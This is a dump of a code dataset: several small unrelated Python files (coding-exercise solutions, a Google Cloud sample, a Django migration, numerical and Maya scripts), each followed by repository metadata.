# NOTE(review): sep=" " has no effect when print() gets a single argument.
tr_harfler = "şçöğüİı"
a = 0
while a < len(tr_harfler):
    print(tr_harfler[a], sep=" ")
    a += 1
|
[
"noreply@github.com"
] |
S-Oktay-Bicici.noreply@github.com
|
561ae3faab88aca8acbdbe2023956a6b79a78cee
|
d40c743378c754b822bc42cfa7ede73792a31ede
|
/sales_by_march.py
|
a56fafb7ead4dc2b25d6515180e7eb7d8368db7d
|
[] |
no_license
|
ShanjinurIslam/HackerRank
|
85127527be319c3f1822c359a5831e4bcce25e8f
|
38d77f2d0f56a6cec4bd544b347ee53d829dc715
|
refs/heads/master
| 2023-02-05T04:28:11.285169
| 2020-12-27T11:21:09
| 2020-12-27T11:21:09
| 320,749,069
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import defaultdict
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
    """Return the number of complete same-color sock pairs in *ar*.

    :param n: declared number of socks (unused; kept for the harness signature)
    :param ar: list of sock color ids
    :return: total pair count
    """
    hash_map = defaultdict(int)
    for color in ar:
        hash_map[color] += 1
    # Each color contributes count // 2 pairs. (Rewritten: the original
    # iterated .keys() and re-indexed the dict; iterate values directly.)
    return sum(count // 2 for count in hash_map.values())
if __name__ == '__main__':
    # HackerRank harness: read n and the sock list from stdin, write the
    # answer to the file named by OUTPUT_PATH.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')

    n = int(input())
    ar = list(map(int, input().rstrip().split()))

    result = sockMerchant(n, ar)
    fptr.write(str(result) + '\n')
    fptr.close()
|
[
"spondoncsebuet@gmail.com"
] |
spondoncsebuet@gmail.com
|
a8b5085e4e8dbff770b58197257f4b8f7f0cdc50
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-apigee-registry/samples/generated_samples/apigeeregistry_v1_generated_registry_get_artifact_sync.py
|
0dbb7b9b471b59e7bc0cd633cdcb3a7389126fc1
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,845
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetArtifact
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-apigee-registry
# [START apigeeregistry_v1_generated_Registry_GetArtifact_sync]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import apigee_registry_v1
def sample_get_artifact():
    """Synchronous sample: fetch one Artifact via the Apigee Registry client."""
    # Create a client
    client = apigee_registry_v1.RegistryClient()

    # Initialize request argument(s)
    request = apigee_registry_v1.GetArtifactRequest(
        name="name_value",
    )

    # Make the request
    response = client.get_artifact(request=request)

    # Handle the response
    print(response)

# [END apigeeregistry_v1_generated_Registry_GetArtifact_sync]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
b4d9ec0b78a5f819546da52b89aaac8c78b7f8a7
|
21c1edbdb863158ed812031c6d63a40ba3bea31f
|
/simple/1_player/deep_crossentropy.py
|
bc72f2f610a42d5a302bebe5698aba4cc9692484
|
[] |
no_license
|
Ollitros/Tic-tac-toe
|
22ebe26bc709f3c16210783b7411ee77c4df8aa7
|
b551e1f60d8cbfc7167c057553dff897e34c7093
|
refs/heads/master
| 2020-03-29T22:00:53.037694
| 2019-05-01T17:02:09
| 2019-05-01T17:02:09
| 150,398,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,173
|
py
|
from sklearn.neural_network import MLPClassifier
import numpy as np
import matplotlib.pyplot as plt
from tic_tac_toe.simple_tic_tac_toe import TicTacToe
def show_progress(batch_rewards, log, percentile, reward_range=[-990, +100]):
    """
    A convenience function that displays training progress.
    No cool math here, just charts.
    """
    # NOTE(review): mutable default `reward_range` is never mutated here, so it
    # is harmless, but a tuple default would be safer.
    mean_reward, threshold = np.mean(batch_rewards), np.percentile(batch_rewards, percentile)
    log.append([mean_reward, threshold])  # running history of (mean, threshold)
    print("mean reward = %.3f, threshold=%.3f" % (mean_reward, threshold))

    plt.figure(figsize=[8, 4])
    # Left panel: mean reward and elite threshold over training iterations.
    plt.subplot(1, 2, 1)
    plt.plot(list(zip(*log))[0], label='Mean rewards')
    plt.plot(list(zip(*log))[1], label='Reward thresholds')
    plt.legend()
    plt.grid()

    # Right panel: histogram of this batch's rewards with the percentile cut.
    plt.subplot(1, 2, 2)
    plt.hist(batch_rewards, range=reward_range)
    plt.vlines([np.percentile(batch_rewards, percentile)], [0], [100], label="percentile", color='red')
    plt.legend()
    plt.grid()
    plt.show()
def select_elites(states_batch, actions_batch, rewards_batch, percentile=50):
    """Keep the states/actions from sessions whose reward meets the percentile cut.

    :param states_batch: list of per-session state lists, states_batch[session_i][t]
    :param actions_batch: list of per-session action lists, actions_batch[session_i][t]
    :param rewards_batch: list of per-session total rewards
    :param percentile: sessions with reward >= this percentile are "elite"
    :returns: (elite_states, elite_actions) — flat 1D lists, preserving the
        original session order and within-session time order
    """
    reward_threshold = np.percentile(rewards_batch, percentile)

    elite_states, elite_actions = [], []
    for session_states, session_actions, session_reward in zip(
            states_batch, actions_batch, rewards_batch):
        if session_reward >= reward_threshold:
            elite_states.extend(session_states)
            elite_actions.extend(session_actions)
    return elite_states, elite_actions
def generate_session(t_max=1000):
    """Play one tic-tac-toe episode with the module-level `agent` and `env`.

    Returns (states, actions, total_reward) for the session. Relies on the
    module globals `env`, `agent` and `n_actions` defined below.
    """
    states, actions = [], []
    total_reward = 0
    s = env.reset()
    print("State-reset: ", s)
    for t in range(t_max):
        print("\nStep inside step - ", t)
        # a vector of action probabilities in current state
        probs = agent.predict_proba([s])[0]
        print("Probs: ", probs)
        a = np.random.choice(n_actions, 1, p=probs)[0]
        print("Action:", a)
        # NOTE(review): occupied cells are skipped without renormalizing
        # `probs`, so the loop may burn many iterations re-sampling -- and the
        # skipped step is not recorded. Presumably intentional; verify.
        action = env.states
        if action[a] == 1:
            continue
        new_s, r, done = env.step(a, 1)
        # record sessions like you did before
        states.append(s)
        actions.append(a)
        total_reward += r
        s = new_s
        print("new_state - ", new_s)
        print("r = ", r)
        if done:
            break
    return states, actions, total_reward
# --- Cross-entropy-method training loop for the tic-tac-toe agent. ---
env = TicTacToe()
env.reset()
n_actions = env.n
print("Actions: \n", env.actions)
print("Total number of actions: ", n_actions)
agent = MLPClassifier(hidden_layer_sizes=(20, 20),
                      activation='tanh',
                      warm_start=True,
                      max_iter=1  # make only 1 iteration on each .fit(...)
                      )
# initialize agent to the dimension of state an amount of actions
print([env.reset()] * n_actions)
agent.fit([env.reset()] * n_actions, range(n_actions))
n_sessions = 100
percentile = 70
log = []
for i in range(50):
    print('\n\n\n !!! STEP - ', i + 1)
    # generate new sessions
    sessions = [generate_session() for i in range(n_sessions)]
    batch_states, batch_actions, batch_rewards = map(np.array, zip(*sessions))
    elite_states, elite_actions = select_elites(batch_states, batch_actions, batch_rewards, percentile)
    # print(elite_states[:3])
    # print(elite_actions[:3])
    # Refit on elite (state, action) pairs only; warm_start keeps prior weights.
    agent.fit(elite_states, elite_actions)
    show_progress(batch_rewards, log, percentile, reward_range=[0, np.max(batch_rewards)])
    # NOTE(review): the win message does not `break`; training continues
    # for the remaining iterations -- confirm that is intended.
    if np.mean(batch_rewards) > 50:
        print("You Win! You may stop training now via KeyboardInterrupt.")
|
[
"Ollitros@gmail.com"
] |
Ollitros@gmail.com
|
2f13a478783bf8420e554f05869dea7277b04405
|
44fc88370e7dd01aab918aa797983c5051f4147e
|
/Controllers/TestThread.py
|
eb4dc07460106b86c8a16d0ffce941059358f7c6
|
[] |
no_license
|
Sispheor/PiHomeAlone
|
1f1a9aa619b97483a61972b58094c6cec961161a
|
7356adddc0e936b8c8f6bd45813ec012196edefd
|
refs/heads/master
| 2021-01-15T16:57:20.813213
| 2016-08-31T20:14:02
| 2016-08-31T20:14:02
| 64,602,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 369
|
py
|
import threading
class TestThread(threading.Thread):
def __init__(self, shared_queue):
super(TestThread, self).__init__()
self.shared_queue = shared_queue
def run(self):
print "Run test thread"
while True:
if not self.shared_queue.empty():
val = self.shared_queue.get()
print val
|
[
"nico.marcq@gmail.com"
] |
nico.marcq@gmail.com
|
a3e1e62573d08a5efcf9b3c114322ce3211071fb
|
4e23ff457c737886d3f1280162b90987bbc12211
|
/main/apps/carts/migrations/0003_auto_20190120_0337.py
|
bd278830f6b8cdc994bdb5beb3c617c35c70510e
|
[] |
no_license
|
ehoversten/Ecommerce_Django
|
8ab1edeb1b7ed2a0e9f33920ecccc2d6b1996cd9
|
b109b62e2fd318c4feb37c448898cbeada722968
|
refs/heads/master
| 2022-12-21T09:42:53.317891
| 2019-02-14T16:24:00
| 2019-02-14T16:24:00
| 143,313,907
| 6
| 2
| null | 2022-11-22T02:34:42
| 2018-08-02T15:34:32
|
Python
|
UTF-8
|
Python
| false
| false
| 660
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-01-20 03:37
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):
    """Alter Cart.subtotal and Cart.total to DecimalField(max_digits=10, decimal_places=2).

    Auto-generated; do not hand-edit once applied.
    """

    dependencies = [
        ('carts', '0002_cart_subtotal'),
    ]

    operations = [
        migrations.AlterField(
            model_name='cart',
            name='subtotal',
            field=models.DecimalField(decimal_places=2, default=0.0, max_digits=10),
        ),
        migrations.AlterField(
            model_name='cart',
            name='total',
            field=models.DecimalField(decimal_places=2, default=0.0, max_digits=10),
        ),
    ]
|
[
"ehoversten@gmail.com"
] |
ehoversten@gmail.com
|
c40022197521b3fda780acbc6aeb293021154248
|
fa1eb33b885bd03a56a542720c4f823654457bd5
|
/tests/test_image_search.py
|
b4169a9b82cd7fb74be11c9f5050def5e6b7800c
|
[] |
no_license
|
jhoover4/fcc-api-projects
|
16753435017518c0594db9ead3606691280fadc4
|
b21f830c0f1047e0cb28f71387de4581cd4be523
|
refs/heads/master
| 2022-12-11T03:44:22.103645
| 2018-12-26T19:24:13
| 2018-12-26T19:25:52
| 118,831,587
| 0
| 0
| null | 2022-12-08T01:26:31
| 2018-01-24T22:44:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
import datetime
import json
import unittest
from test_app import BaseTestCase
import models
class TestImageSearchView(BaseTestCase, unittest.TestCase):
    """Smoke tests for the image-search description page and its DB table."""

    def test_check_table(self):
        # The ImageSearch table must exist after BaseTestCase setup.
        assert models.ImageSearch.table_exists()

    def test_index(self):
        """Test that the description view for this api is running."""
        url = self.app.get('/image-search')
        self.assertTrue(url.data)
        self.assertEqual(url.status_code, 200)
class TestImageSearchApi(BaseTestCase, unittest.TestCase):
    """End-to-end tests for /api/image-search.

    NOTE(review): these tests appear to hit a live search backend (results
    include displayLink/formattedUrl), so they are network-dependent -- verify.
    """

    def setUp(self):
        super().setUp()
        # Pre-seed one search record for the /recent endpoint test.
        self.search_record = models.ImageSearch.create(search_query='cats')

    def test_new_search(self):
        """Test search is performed correctly and returns json data."""
        response = self.app.get('/api/image-search/cats')
        self.assertEqual(response.status_code, 200)
        self.assertTrue(response.json[0]['displayLink'])

    def test_new_search_offset(self):
        """Test search is performed correctly with offset parameter"""
        response = self.app.get('/api/image-search/cats')
        offset_response = self.app.get('/api/image-search/cats', query_string={'offset': 15})
        self.assertEqual(offset_response.status_code, 200)
        # Offsetting should yield a different first result than page one.
        self.assertNotEqual(offset_response.json[0]['formattedUrl'], response.json[0]['formattedUrl'])

    def test_new_query_in_args(self):
        """Test search is performed with query in parameters."""
        response = self.app.get('/api/image-search', query_string={'query': 'cats'})
        self.assertEqual(response.status_code, 200)
        self.assertTrue(response.json[0]['displayLink'])

    def test_new_query_in_args_empty(self):
        """Test error is thrown if query not in url at all."""
        response = self.app.get('/api/image-search')
        self.assertEqual(response.status_code, 400)
        self.assertEqual(json.loads(response.data), {
            'message': 'Query is required.'
        })

    def test_recent_searches(self):
        """Test all searches are returned on GET."""
        response = self.app.get('/api/image-search/recent')
        expected_data = [{
            'query': self.search_record.search_query,
            'when': datetime.datetime.strftime(self.search_record.created_at, '%a, %d %b %Y %X -0000')
        }]
        self.assertEqual(response.status_code, 200)
        self.assertEqual(json.loads(response.data), expected_data)
|
[
"jordan@hoovermld.com"
] |
jordan@hoovermld.com
|
c253640dbc26eb41517006f2f80be5e9f19b2aaf
|
2e9748e6dc278a5a84184216d94ab2c841ec8482
|
/image_process/opencv/noise_remove_inpaint/main.py
|
17a39c66a3aa56f6b191aaa81377d6ade7690a95
|
[
"MIT"
] |
permissive
|
ybdesire/machinelearning
|
fa2bc20240e88513475358c761d067108e1eadf8
|
0224746332e1085336e0b02e0ca3b11d74bd9a91
|
refs/heads/master
| 2021-12-08T04:46:56.344543
| 2021-11-19T07:57:47
| 2021-11-19T07:57:47
| 54,877,464
| 30
| 19
| null | 2021-08-13T01:23:08
| 2016-03-28T08:16:06
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 208
|
py
|
# Remove masked regions from an image with OpenCV's Telea inpainting.
import numpy as np  # NOTE(review): unused in this script
import cv2 as cv

img = cv.imread('messi.png')
mask = cv.imread('mask.png',0)  # 0 = load mask as single-channel grayscale
# Inpaint pixels where mask != 0, using a 3-pixel neighborhood radius.
dst = cv.inpaint(img,mask,3,cv.INPAINT_TELEA)
cv.imshow('dst',dst)
cv.waitKey(0)
cv.destroyAllWindows()
|
[
"ybdesire@gmail.com"
] |
ybdesire@gmail.com
|
129f9191f2f84ac88110b03e3dcf1e00a852b049
|
3c92c3f633b613a62fb67476fd617e1140133880
|
/leetcode/605. Can Place Flowers.py
|
db797a8c9e9dcebc16f5082e85a622b0163ba516
|
[] |
no_license
|
cuiy0006/Algorithms
|
2787f36f8164ded5252a006f723b570c9091bee9
|
00fd1397b65c68a303fcf963db3e28cd35c1c003
|
refs/heads/master
| 2023-03-31T13:55:59.191857
| 2023-03-31T03:39:42
| 2023-03-31T03:39:42
| 75,001,651
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
class Solution:
    def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:
        """Return True if `n` new flowers fit in `flowerbed` with no two adjacent.

        Greedy left-to-right scan with early exit. Unlike the naive version,
        this does NOT mutate the caller's list: the effect of a virtual
        planting is tracked in `prev` instead of written back.
        """
        if n == 0:
            return True
        remaining = n
        prev = 0  # effective occupancy of plot i-1, including virtual plantings
        for i, plot in enumerate(flowerbed):
            if plot == 1:
                prev = 1
                continue
            nxt = flowerbed[i + 1] if i + 1 < len(flowerbed) else 0
            if prev == 0 and nxt == 0:
                # Plant here (virtually) and count it.
                prev = 1
                remaining -= 1
                if remaining == 0:
                    return True
            else:
                prev = 0
        return False
|
[
"noreply@github.com"
] |
cuiy0006.noreply@github.com
|
f68d2ca23b8e9660445df4f664adf81a10a1b580
|
dd6a3615d54ca825051f1c9f81bcd206eb9cfd10
|
/setup.py
|
91bcc6ec95068bd0fb034196004e350c1d121a19
|
[
"MIT"
] |
permissive
|
cherakhan/mps
|
82e06aea229b2047bf1be68c4430fad621189abf
|
2ba818c361e467841f6bbe0ef47a1e833ef315d3
|
refs/heads/master
| 2022-02-01T20:40:07.327357
| 2019-06-10T03:43:49
| 2019-06-10T03:43:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,162
|
py
|
#!/usr/bin/env python
"""Packaging script for doe-mps."""

import os  # NOTE(review): unused
from setuptools import find_packages  # NOTE(review): imported but packages are listed manually

with open('README.md', 'r') as f:
    LONG_DESCRIPTION = f.read()

# NOTE(review): numpy.distutils is deprecated (removed for Python >= 3.12);
# Extension is imported but never used -- plain setuptools.setup would suffice.
from numpy.distutils.core import setup, Extension

setup_options = dict(
    name='doe-mps',
    version="0.1.1",
    long_description=LONG_DESCRIPTION,
    long_description_content_type="text/markdown",
    url='https://github.com/kirthevasank/mps/',
    license='MIT',
    author_email='kandasamy@cs.cmu.edu',
    packages=['mps', 'mps.exd', 'mps.policies', 'mps.utils', 'mps.prob'],
    install_requires=[
        'future',
        'numpy',
        'scipy',
        'six',
    ],
    classifiers=[
        "Intended Audience :: Developers",
        "Intended Audience :: Education",
        "Intended Audience :: Science/Research",
        "License :: OSI Approved :: MIT License",
        "Operating System :: MacOS",
        "Operating System :: Microsoft :: Windows",
        "Operating System :: POSIX :: Linux",
        "Operating System :: Unix",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 3",
        "Topic :: Scientific/Engineering :: Artificial Intelligence",
    ],
)

setup(**setup_options)
|
[
"kandasamy@cs.cmu.edu"
] |
kandasamy@cs.cmu.edu
|
d2fb24dfd527c8ee0ac66cd54930611e44b3d5c6
|
34652a47355a8dbe9200db229a1bbc62619de364
|
/Maths/diff_eqns/Runge_Kutta_method_2.py
|
98e189db514dbf1126d73f217e5d7515b190d817
|
[] |
no_license
|
btrif/Python_dev_repo
|
df34ab7066eab662a5c11467d390e067ab5bf0f8
|
b4c81010a1476721cabc2621b17d92fead9314b4
|
refs/heads/master
| 2020-04-02T13:34:11.655162
| 2019-11-10T11:08:23
| 2019-11-10T11:08:23
| 154,487,015
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
def rKN(x, fx, n, hs):
    """Advance an n-dimensional state one classical RK4 step of size hs.

    x  -- state vector (list of n numbers); updated IN PLACE and returned
    fx -- list of n derivative functions, each mapping the full state to a float
    n  -- number of state components
    hs -- step size
    """
    k1 = [fx[i](x) * hs for i in range(n)]
    xk = [x[i] + k1[i] * 0.5 for i in range(n)]
    k2 = [fx[i](xk) * hs for i in range(n)]
    for i in range(n):
        xk[i] = x[i] + k2[i] * 0.5
    k3 = [fx[i](xk) * hs for i in range(n)]
    for i in range(n):
        xk[i] = x[i] + k3[i]
    k4 = [fx[i](xk) * hs for i in range(n)]
    # Weighted RK4 combination: (k1 + 2*k2 + 2*k3 + k4) / 6, written back into x.
    for i in range(n):
        x[i] = x[i] + (k1[i] + 2 * (k2[i] + k3[i]) + k4[i]) / 6
    return x
import math  # required by fa1; the original file never imported math (NameError at call time)


def fa1(x):
    """Van der Pol-style derivative of x[0]: 0.9*(1 - x1^2)*x0 - x1 + sin(x2)."""
    return 0.9*(1 - x[1]*x[1])*x[0] - x[1] + math.sin(x[2])

def fb1(x):
    """Derivative of x[1] is x[0]."""
    return x[0]

def fc1(x):
    """x[2] advances at the constant rate 0.5 (acts as scaled time)."""
    return 0.5
def VDP1():
    """Integrate the 3-component system (fa1, fb1, fc1) for 20000 RK4 steps.

    NOTE(review): the result `x` is neither returned nor printed, so this
    runs purely for its side effects (none visible) -- confirm intent.
    """
    f = [fa1, fb1, fc1]
    x = [1, 1, 0]      # initial state
    hs = 0.05          # step size
    for i in range(20000):
        x = rKN(x, f, 3, hs)
def rK3(a, b, c, fa, fb, fc, hs):
    """One classical RK4 step for a 3-variable system; returns updated (a, b, c).

    fa, fb, fc -- derivative functions of the full state (a, b, c)
    hs         -- step size
    """
    def slopes(av, bv, cv):
        # Evaluate all three derivatives at one point, pre-scaled by hs.
        return fa(av, bv, cv)*hs, fb(av, bv, cv)*hs, fc(av, bv, cv)*hs

    a1, b1, c1 = slopes(a, b, c)
    a2, b2, c2 = slopes(a + a1*0.5, b + b1*0.5, c + c1*0.5)
    a3, b3, c3 = slopes(a + a2*0.5, b + b2*0.5, c + c2*0.5)
    a4, b4, c4 = slopes(a + a3, b + b3, c + c3)
    a = a + (a1 + 2*(a2 + a3) + a4)/6
    b = b + (b1 + 2*(b2 + b3) + b4)/6
    c = c + (c1 + 2*(c2 + c3) + c4)/6
    return a, b, c
import math  # required by fa2; the original file never imported math (NameError at call time)


def fa2(a, b, c):
    """Van der Pol-style derivative of a: 0.9*(1 - b^2)*a - b + sin(c)."""
    return 0.9*(1 - b*b)*a - b + math.sin(c)

def fb2(a, b, c):
    """Derivative of b is a."""
    return a

def fc2(a, b, c):
    """c advances at the constant rate 0.5 (acts as scaled time)."""
    return 0.5
def VDP2():
    """Integrate (fa2, fb2, fc2) for 20000 RK4 steps using the scalar rK3 form.

    NOTE(review): like VDP1, the final state is discarded -- confirm intent.
    """
    a, b, c, hs = 1, 1, 0, 0.05
    for i in range(20000):
        a, b, c = rK3(a, b, c, fa2, fb2, fc2, hs)
|
[
"bogdan.evanzo@gmail.com"
] |
bogdan.evanzo@gmail.com
|
ce033b921042d603ac116dcbe76a4c8e40f95ad7
|
a227947112fe8a3fd8078bcdfee22b82385f5490
|
/aat/config/enums.py
|
25fa292208b39967d8415ad9fd63dbece71a9fc3
|
[
"Apache-2.0"
] |
permissive
|
Sahanduiuc/aat-1
|
43465f6060d084a5442af8685266e0cd009a8626
|
0aee0f9943b5e16f29ec69faea5f9e5a937c5e5d
|
refs/heads/master
| 2022-11-15T21:16:28.580803
| 2020-06-14T22:14:37
| 2020-06-14T22:14:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
from enum import Enum
class BaseEnum(Enum):
    """Enum base whose string form is the member's value, not 'Class.NAME'."""

    def __str__(self):
        return '{}'.format(self.value)
class Side(BaseEnum):
    """Order direction."""
    BUY = 'BUY'
    SELL = 'SELL'


class EventType(BaseEnum):
    """Event categories flowing through the engine."""
    # Trade events
    TRADE = 'TRADE'

    # Order events
    OPEN = 'OPEN'
    CANCEL = 'CANCEL'
    CHANGE = 'CHANGE'
    FILL = 'FILL'

    # Other data events
    DATA = 'DATA'

    # System events
    HALT = 'HALT'
    CONTINUE = 'CONTINUE'

    # Engine events
    ERROR = 'ERROR'
    START = 'START'
    EXIT = 'EXIT'


class DataType(BaseEnum):
    """Kind of market-data payload."""
    ORDER = 'ORDER'
    TRADE = 'TRADE'


class InstrumentType(BaseEnum):
    """Tradable instrument categories; commented entries are not yet supported."""
    CURRENCY = 'CURRENCY'
    # PAIR = 'PAIR'
    EQUITY = 'EQUITY'
    # BOND = 'BOND'
    # OPTION = 'OPTION'
    # FUTURE = 'FUTURE'


class OrderType(BaseEnum):
    """Execution style of an order."""
    # Order Types
    LIMIT = 'LIMIT'
    MARKET = 'MARKET'
    STOP = 'STOP'


class OrderFlag(BaseEnum):
    """Time-in-force / fill-condition modifier attached to an order."""
    # Order Flag
    NONE = 'NONE'
    FILL_OR_KILL = 'FILL_OR_KILL'
    ALL_OR_NONE = 'ALL_OR_NONE'
    IMMEDIATE_OR_CANCEL = 'IMMEDIATE_OR_CANCEL'
|
[
"t.paine154@gmail.com"
] |
t.paine154@gmail.com
|
9b58eff7ed3daf3e244f4bf1236dffbbb10d87fc
|
a222e2999251ba7f0d62c428ba8cc170b6d0b3b7
|
/AtC_Beg_Con_111-120/ABC111/B-AtCoder_Beginner_Contest_111.py
|
81b7210ed85e1fae5ea424f1edba455792a672aa
|
[
"MIT"
] |
permissive
|
yosho-18/AtCoder
|
3e1f3070c5eb44f154c8104fbd5449f47446ce14
|
50f6d5c92a01792552c31ac912ce1cd557b06fb0
|
refs/heads/master
| 2020-06-02T10:21:29.458365
| 2020-05-29T12:40:48
| 2020-05-29T12:40:48
| 188,795,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 365
|
py
|
n = int(input())
# Print the smallest repdigit multiple of 111 in [111, 999] that is >= n;
# like the original chain of ifs, print nothing when n > 999.
for candidate in range(111, 1000, 111):
    if n <= candidate:
        print(candidate)
        break
|
[
"44283410+wato18@users.noreply.github.com"
] |
44283410+wato18@users.noreply.github.com
|
7ea4bcf5409fe244dc0f83e9747b2ac105b38bb1
|
1b05b6f4d96a14ba2beea7ff43bdaae124bbe41b
|
/Gdt/algorithm/algorithm/dxregulation.py
|
f4f402d65a63ddd6ec0dcb3c4fc66b74c731761b
|
[] |
no_license
|
shmilyrj126/NetWork
|
27fcbde777c6ee25abfdd09a381c1a7a743d742a
|
957f0679f01d2a09d217516518ddd9693c0b2a80
|
refs/heads/master
| 2022-12-13T00:19:04.208089
| 2020-09-17T12:59:29
| 2020-09-17T12:59:29
| 296,340,198
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 474
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 22 09:11:21 2019

@author: hsc
"""
import numpy as np
import pandas as pd  # import the pandas package

data1 = pd.read_csv("C:\\Users\\hsc\\Desktop\\w4.csv")
data2 = pd.read_csv("C:\\Users\\hsc\\Desktop\\w5.csv")
print(data1)
print(data2)

n = len(data1)
# NOTE(review): the original lines below did not parse (`columns==`, a bare
# `DataFrame`, `for i in n`, and `=` used as a comparison). Reconstructed
# intent: record an entry for each row where data1["V1"] matches data2["N1"]
# -- TODO confirm against the actual CSV schemas.
data3 = pd.DataFrame(columns=["N", "1", "2", "3"])
for i in range(n):
    if data1["V1"].iloc[i] == data2["N1"].iloc[i]:
        data3.loc[i, "N"] = data2.index[i]
|
[
"noreply@gitee.com"
] |
noreply@gitee.com
|
a5cbd4174a07e88112f6ff2349b897cace44db22
|
581c041a0a32f051508f3b0a167656cb6169c2fe
|
/project_management/notifications/.svn/text-base/urls.py.svn-base
|
86d4d6a3ade25ed394867f009ed21fd231ac89d5
|
[] |
no_license
|
raveena17/ILASM
|
da38258b6739e823b973c2bede2a21dd04e0941e
|
7a337e0e3a20180b9564de68ab22620dc9aa1a36
|
refs/heads/master
| 2022-12-05T14:34:45.929663
| 2019-06-25T14:18:47
| 2019-06-25T14:18:47
| 193,101,540
| 0
| 0
| null | 2022-12-03T15:11:35
| 2019-06-21T13:20:47
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 325
|
"""
urls for event application
"""
from django.conf.urls.defaults import patterns
urlpatterns = patterns('project_management.notifications',
(r'^create/$', 'views.manage_event'),
(r'^update/(?P<id>\d+)/$', 'views.manage_event'),
(r'^list/$', 'views.event_list'),
(r'^delete/$', 'views.delete_event'),
)
|
[
"raveena@5gindia.net"
] |
raveena@5gindia.net
|
|
76a97aedfd25a25ec5052821f9d86f5d50382bcd
|
aa0366a8632f334fb35e6bdc78717f3456202eb7
|
/old/bdApiGetCom_v02.py
|
676422673aa737b8010d9f1ed60f43dc04226cfb
|
[] |
no_license
|
Mortaciunea/bdScripts
|
0891478096f3a5876655896c9649c0a7204d5ee8
|
4f6e9d2b181bb4a90c1ccfcaca64c22ecbe0dd59
|
refs/heads/master
| 2020-12-24T13:36:57.930038
| 2015-09-03T16:03:46
| 2015-09-03T16:03:46
| 41,869,547
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,026
|
py
|
import maya.cmds as cmds
import maya.OpenMaya as om

def bdGetCentroid(vectorArray):
    """Average of three vertex vectors relative to a global reference point.

    NOTE(review): `pointInsideVec` is not defined anywhere in this file
    (NameError at call time), and three terms are divided by 4 -- both look
    like bugs; the true formula must be confirmed before fixing.
    """
    center = ((vectorArray[0] - pointInsideVec) + (vectorArray[1] - pointInsideVec) + (vectorArray[2] - pointInsideVec))/4
    return center
def bdGetComMain():
    """Compute a mesh's center of mass (Python 2 / Maya API 1.0).

    Uses the locator 'pointInsideLoc' as the interior reference point,
    tetrahedralizes the selected mesh per polygon, accumulates
    volume-weighted centroids, and moves 'comLoc' to the result.

    NOTE(review): calls bdCalculateVolume/bdCalculateCenter, which are not
    defined in this file (only bdGetCentroid is) -- presumably defined
    elsewhere or renamed; verify before running.
    """
    mDagObject = om.MDagPath()
    mSelList = om.MSelectionList()
    mDagPointInside = om.MDagPath()
    mSelList.add('pointInsideLoc')
    mSelList.getDagPath(0,mDagPointInside)
    #mDagPointInside.pop()
    mTransformPointInside = om.MFnTransform(mDagPointInside)
    # World-space position of the interior reference locator.
    mPointInsideVector = mTransformPointInside.getTranslation(om.MSpace.kWorld)
    print mDagPointInside.fullPathName()
    om.MGlobal.getActiveSelectionList(mSelList)
    numSel = mSelList.length()
    if numSel == 1:
        mSelList.getDagPath(0,mDagObject)
        #print mDagObject.fullPathName()
        if mDagObject.hasFn(om.MFn.kMesh):
            mFnMesh = om.MFnMesh(mDagObject)
            volumes = om.MFloatArray()
            centers = om.MVectorArray()
            # Per-polygon tetra volume and centroid relative to the reference point.
            for i in range(mFnMesh.numPolygons()):
                mVertsId = om.MIntArray()
                mFnMesh.getPolygonVertices(i,mVertsId)
                mVertPosArray = om.MVectorArray()
                for vert in mVertsId:
                    mVertPos = om.MPoint()
                    mFnMesh.getPoint(vert,mVertPos)
                    mPointVector = om.MVector(mVertPos)
                    mVertPosArray.append(mPointVector)
                volumes.append(bdCalculateVolume(mVertPosArray,mPointInsideVector))
                centers.append(bdCalculateCenter(mVertPosArray,mPointInsideVector))
